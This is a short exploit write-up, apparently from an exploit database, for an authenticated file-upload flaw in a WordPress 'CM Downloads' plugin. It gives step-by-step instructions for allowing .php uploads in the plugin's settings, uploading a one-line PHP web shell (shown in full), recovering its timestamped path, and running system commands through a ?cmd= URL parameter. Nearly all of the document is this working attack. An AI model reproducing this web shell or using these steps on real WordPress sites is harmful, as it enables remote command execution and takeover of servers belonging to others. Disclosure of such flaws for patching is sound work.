Share
## https://sploitus.com/exploit?id=WPEX-ID:D18E695B-4D6E-4FF6-A060-312594A0D2BD
##########################
Activate PHP extension:
##########################

- Log in and go to "CM Downloads" > "Settings" > "General".

- Now you can simply add php extension to "Allowed file extensions:" field because the plugin does not check for php extension.

##################################
Upload our malicious PHP file:
##################################

- Go to "CM Downloads" > "Add New".

- Upload our malicious file :

	For example : malicious_php.php 
	<?=`$_GET[cmd]`?>

##########################
Find the right path:
##########################

We have two methods here because the code looks like:

   $name = time() . '_' . sanitize_file_name($_download_file['name']);

But we don't need to write a script, we can exploit this more easily:

- Go to "CM Downloads" > "CM Downloads".
- Click on "Edit" on the name we gave to our Download and now we are redirect on a page.
- We need to get the id present in the url for the following : http://target/cmdownload/edit/id/7/ => so here it's 7
- We can find the name of our malicious file below the "Browse" button : 1660921772_malicious_php.php
- So now we can execute system command:

 => target/wp-content/uploads/cmdm/id/filename

 https://target/wp-content/uploads/cmdm/7/1660921772_malicious_php.php?cmd=command